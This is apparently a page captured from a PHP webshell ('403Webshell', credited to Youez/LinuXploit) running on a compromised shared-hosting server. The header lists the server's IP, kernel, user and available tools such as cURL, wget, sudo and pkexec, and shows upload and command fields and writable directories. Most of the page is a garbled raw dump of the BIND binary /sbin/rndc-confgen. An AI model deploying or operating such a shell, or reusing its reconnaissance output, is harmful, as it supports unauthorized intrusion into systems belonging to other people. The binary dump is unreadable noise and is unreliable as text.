403Webshell
Server IP : 50.116.87.64  /  Your IP : 18.191.14.50
Web Server : Apache
System : Linux br832.hostgator.com.br 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : evol2597 ( 2401)
PHP Version : 8.2.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /sbin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /sbin/rndc-confgen
ELF>�@@�F@8	@@@@@@��88@8@@@�1�1 �<�<`�<`d� ==`=`��TT@T@DDP�td�.�.@�.@||Q�tdR�td�<�<`�<`/lib64/ld-linux-x86-64.so.2GNU GNU�|6��:?x����r�&Bs(0�� @	024BE���|����qX����G~��m����K�"�/iB2Qc[f9��y��,Z-��D��%p|�� ��\A`��B`��@�\A`�d%@libdns.so.1102isc_result_totextisc__mem_getisc_entropy_detachisc_mem_createisc_md5_availableisc__mem_putisc_base64_totext__gmon_start__dst_key_generatedst_key_tobufferdst_key_free_finidns_rootnamedst_lib_destroydst_lib_initlibisc.so.169isc_commandline_parseisc_commandline_argumentisc_entropy_destroysourceisc_file_safecreateisc_mem_statsisc_mem_destroyisc_entropy_usebestsourceisc_commandline_errprintisc_entropy_createisc_file_prognameisc_commandline_indexisc_commandline_optionisc_mem_debugginglibgssapi_krb5.so.2libkrb5.so.3libk5crypto.so.3libcom_err.so.2libcrypto.so.10libcap.so.2libpthread.so.0__errno_locationlibGeoIP.so.1libxml2.so.2libz.so.1libm.so.6libdl.so.2libc.so.6fflush__printf_chkexit__stack_chk_failinet_ptonstrtolgetpwnam__fprintf_chkfchownfputcfclosestrcasecmpstderr__snprintf_chkstrncasecmpfileno__vfprintf_chk__libc_start_mainferror_edata__bss_start_endGLIBC_2.2.5GLIBC_2.4GLIBC_2.3.4n ui	��ii
�ui	�ti	��?`�?`	�?`�?`�?`$�?`%�?`'�?`.@` @`(@`0@`8@`@@`H@`P@`
X@``@`h@`
p@`x@`�@`�@`�@`�@`�@`�@`�@`�@`�@`�@`�@`�@`�@`�@`�@` �@`!A`"A`#A`&A`( A`)(A`*0A`+8A`,@A`-HA`.PA`/H��H�/ H��t�H����5�. �%�. @�%�. h����%�. h�����%�. h����%�. h����%�. h����%�. h����%�. h����%�. h�p����%�. h�`����%�. h	�P����%�. h
�@����%�. h�0����%�. h� ����%�. h
�����%�. h�����%z. h���%r. h����%j. h�����%b. h����%Z. h����%R. h����%J. h����%B. h����%:. h�p����%2. h�`����%*. h�P����%". h�@����%. h�0����%. h� ����%
. h�����%. h�����%�- h���%�- h ����%�- h!�����%�- h"����%�- h#����%�- h$����%�- h%����%�- h&����%�- h'�p���AWH�
��AVAUA��ATUH��H�5�- SH��(dH�%(H��$1�H��. HDŽ$�H�H��. H�H�}�j������6H��. H�
�- L�5BH�&H�������E�A��A��cE��D��L��$��\	H�U. DŽ$�H�D$xH�D$X�D$h����DŽ$��H�H�++ H�D$p�D$l�H��H�D$`H��$�H��$�H��$�H��$�H�H��D����������n��?��:�
Hc�H��1��q�D$l�DŽ$��H��* �
L��H�8����H��$��D$h�:u��y�H�=1��`H�, ��f���H�O* ��T���H�M* H�H��H��$����A���/���H��$�H�=�1��H�* D�A��?�5���H�* H�
�+ H���H�81��9�����H��) H�
�, H�H����H��) H�H�D$`���H��) H�H�D$p���H��) �
L��H�8���H��$���$��:u=���`���H�Y) H�=*H�01��0H�A) H�H�D$x�4���H�-) H�H�D$X� ���H�) H��$��L�0L������������H��$�L���
���������H�=�1��H��( H�
�* H���D�H��( H�81������|���H�U* H�56�
H������H��( D+(E����|$h�E����L��$�D���1�1�L��I���~�������H�5cH�=v1�H��$�H����L$hH�t$pH��$H��$�I��D��H��$�DŽ$�DŽ$�DŽ$�DŽ$�HDŽ$H��$�H��$�DŽ$�!fuBDŽ$����$��PH�|$X��H�B* H�T$`1�E��H��H�8�
H�|$X1�H���H��H�
* H��H�9H���H��$�H�эH����Lc�D$hL�����H��I����H��) H�
�L�L$XL�NL��L��H�H�m�:/H�T$�HD�H��H�$1����H�T$`H�t$xE��H��L����	H��$�H�
oA��L��L������|$ltH�x& H��$�H�0���L���x���1�H��$dH3%(��H��([]A\A]A^A_�H�D$`��$�H�5"L��$�D��$��L�t$HL�t$8H�D$P�L$@H��H�D$�L$L��H�$L�L$01�D�D$(L�l$ L�t$�����A���D�����D$h�Q���H�( H�T$`E��H�t$xH��H�8����������H�5�H�=�H��1��K�t$hH�=�1��9������1�I��^H��H���PTI�`%@H��$@H�Ǡ@����gA`UH-`A`H��H��w]øH��t�]�`A`����`A`UH-`A`H��H��H��H��?H�H�u]úH��t�]H�ƿ`A`����=)& uUH���~���]�& ��@H�=�! t�H��tU�=`H���]�{����s���H�)' S��H��	�L�H�' L�H��& H�H�4$ H�81��r��������f.��SH�����H�t$(H�T$0H�L$8L�D$@L�L$Ht7)D$P)L$`)T$p)�$�)�$�)�$�)�$�)�$�dH�%(H�D$1�H�=% ���tMH��# H��$�H���H���$H�D$H�D$ �D$0H�;H�D$��H�3�
�:���H�D$dH3%(u	H���[�����f�f.�USH�����H�t$(H�T$0H�L$8L�D$@L�L$Ht7)D$P)L$`)T$p)�$�)�$�)�$�)�$�)�$�dH�%(H�D$1�H��H��H��" H�V% H�;H�1�����H��$�H�;H��H���$H�D$H�D$ �D$0H�D$���H�3�
�3��������f���c@��wwH��@��Hc�H��H�s��H�m��H�i��H�e��H�a��H���H�M��SH�5FH�����H�S��H�5�
HD�H�����tH�5�
H����������u��[�f���������tԉ�[�fDH�5�
H�����������t�H�5�
H����������t�H�5�
H����������t�H�5�
H�����҃�����c1�@��wH��@������DAWAVAUATU��SH���dH�%(H��$�1��BcL�D$H�D$(H�D$0H�D$8<��H�<��H��I��A��Hc�H�������A�D$�=��UL�l$0H��L�������H�5�H�=K1����M���EH�=��	L�������)�����Ƀ�����LD�L�t$(H�|$0L��L���f���5H�5�H�=�
1��y���H�t$0�H���W���%H�5kH�=�
1��J���H�C @��H�l$8H�\$�$E1�H�l$1�A��H�8D���#����H�5.H�=[
1����H�|$8H��$�H�t$P�D$`@�D$dH�D$X�D$h�D$lHDŽ$�H�D$p����H�D$x�����D$P!fuBDŽ$��I����H�5�H�=�	1��l���H�D$XH�L$H�|$@H������H�D$@�D$d�D$H����ZH�5zH�=�	1��"���H�|$(tL���2�H�|$8tH���R�L�������H��$�dH3%(ueH���[]A\A]A^A_ÍA�=������H�=C��1����f�H�=m
@��1����fD����H�=K
���m����8�����H�5H
H�=�H��1��I��������H�5I
H�=�H��1��*�������H�5?
H�=H��1���������H�57
H�=`H��1�������u�H�5%
H�=AH��1��������V�H�5
H�="H��1����H�=D��1����f.�AVAUI��ATI��UH��SH��A��H�� dH�%(H�D$1��O���H�t$H��I��H�D$������H�5�	H�=�1��9���M��tH�|$L��������H�ED�MH��
H�|$M��L��H�$1��T�H�|$���H�|$������H�|$�.���uaH�� H�k	H�پH�81��
�H�D$dH3%(u,H�� []A\A]A^É���H�5�H�=�H��1��^����)�H�=�H��1��H���H�=�H��1��7���H�=�1��)���f�USH��H��H���_�H��t"�hH����H���������[��]�k��c��H�������[]ÐAWA��AVI��AUI��ATL�%� UH�-� SL)�1�H��H�����H��t�L��L��D��A��H��H9�u�H��[]A\A]A^A_Ðf.���H��H���Usage:
 %s [-a] [-b bits] [-c keyfile] [-k keyname] [-p port] [-r randomfile] [-s addr] [-t chrootdir] [-u user]
  -a:		 generate just the key clause and write it to keyfile (%s)
  -A alg:	 algorithm (default %s)
  -b bits:	 from 1 through 512, default 256; total length of the secret
  -c keyfile:	 specify an alternate key file (requires -a)
  -k keyname:	 the name as it will be used  in named.conf and rndc.conf
  -p port:	 the port named will listen on and rndc will connect to
  -r randomfile: source of random data (use "keyboard" for key timing)
  -s addr:	 the address to which rndc should connect
  -t chrootdir:	 write a keyfile in chrootdir as well (requires -a)
  -u user:	 set the keyfile owner to "user" (requires -a)
-b requires a non-negative number-s should be an IPv4 or IPv6 address../../../bin/confgen/rndc-confgen.c# Start of rndc.conf
key "%s" {
	algorithm %s;
	secret "%.*s";
};

options {
	default-key "%s";
	default-server %s;
	default-port %d;
};
# End of rndc.conf

# Use with the following in named.conf, adjusting the allow list as needed:
# key "%s" {
# 	algorithm %s;
# 	secret "%.*s";
# };
# 
# controls {
# 	inet %s port %d
# 		allow { %s; } keys { "%s"; };
# };
# End of named.conf
127.0.0.1rndc-key//etc/rndc.keyrndc-confgenUnsupported algorithm '%s'port '%s' out of range%s: invalid argument -%c
%s: unhandled option -%c
aA:b:c:hk:Mmp:r:s:t:u:Vycreate memory context%s: %sisc_mem_get(%d) failed
%s%s%so���4�����������������������"��������������������������������������������������������������������������h�T�@���������%s: hmac-md5hmac-sha1hmac-sha224hmac-sha256hmac-sha384hmac-sha512(unknown)hmac-unsupported algorithm %d
create entropy contextkeyboardstart entropy sourceinitialize dst librarygenerate keydump key to bufferbsse64 encode secretcreate keyfileunable to set file owner
write to %s failed
fclose(%s) failed
wrote key file "%s"
�����0�@�P�`�p���\�\�\�������<�<�����keysize %d out of range (must be 1-512)
keysize %d out of range (must be 1-1024)
key "%s" {
	algorithm %s;
	secret "%.*s";
};
;|X�����������X��������X��x�x�H���8��������zRx�>�*zRx�$���FJw�?;*3$"D��EH�L\���B�N�B �E(�A0�K8�G��
8A0A(B BBBA$����A�G��
AA����A�A�G��P��$���A�L
CQ
G4p�LLx��B�B�B �B(�A0�C8�G��
8A0A(B BBBAD�(�gB�B�E �D(�D0�KP�
0A(A BBBA4�P�OA�A�J Y
HCHOFADh�eB�E�E �E(�H0�H8�M@l8A0A(B BBBd��P@0@�$1BRbn�������@
d%@�<`=`���o�@�@�@
�@`�(
@h@�	���o@���o�o�@=`&@6@F@V@f@v@�@�@�@�@�@�@�@�@@@&@6@F@V@f@v@�@�@�@�@�@�@�@�@@@&@6@F@V@f@v@�@�@rndc-confgen.debug��JI�7zXZ�ִF!t/����]?�E�h=��ڊ̓�N����)pq�0j��l�������CRP�=��7p�,�'�	�^;fKiH��3���PG��~����.YQ#���t�m���"
5&%�,���	��]��Nf��q�Xƹ\�c�����i=�CB�1��a/v|2+�y�g�(���8D˴`-_ga&2�l��3���CԿ��P��Ri���N��(S��Π�DW�Y�~+^�%��S_���
�V���G����,e�K��8�Pȷţw�k��4��5���Z���fnDIV�fN��\�n�m*]+��)�O
^�p����J�N͢�b6�U\���$T6,#���9q��Ҧmψ��O��ur��=dU���-��[�=J˫�O�nu�n�{��ylzi�$��1�
AH��Kd��X�H\?�3VI�C;7'A��G-�<T5�`��wI�Qhn>*4��.u���Xb^��.�D��S��y?z�=�����Z5�w����j�>$B��غf�V�ַ|a��hD��\pA�ˣ"�X��ߎfh^���k���+���R��mri��p����E�:m���w����B�5�Ɖ,�$(xw8�Xk���Ϯ��a�[.6wד>U�[:����B�y$��@��ϴ���ĈW.��H5ۗ�go����Q3޸~�]Q��]]0�-�~�nq
��K�i�U;��]�B֓�`��dvk{
��k�١�a_�� ~^Q�����m�x���O�IH@�L�������]��ilX
�۪���y��1T��'B��{��UU�SD-�U�>��Ҽ�]��P6��Z�
��ś�*n�ނی{4�z>��$�˙
90,iL��BXq"3�y��FW�"�]%SL	��
��b��1篴�u��8ǣ�R����+n�3F��A�������'�4�Z5a���}���sf����� �ɱ�g�YZ.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.got.plt.data.bss.gnu_debuglink.gnu_debugdata8@8T@T !t@t$4���o�@�8>�@��F�@��N���o�@�j[���o@`jh@h�tB(
@(
�~�@�y@���@���d%@d%	��%@�%8	 ��.@�.|�8/@8/���<`�<�=`=�=`=�=`=���?`�?@�@`@X�XA`XA�`A`\A` �\A�tA�lE


Youez - 2016 - github.com/yon3zu
LinuXploit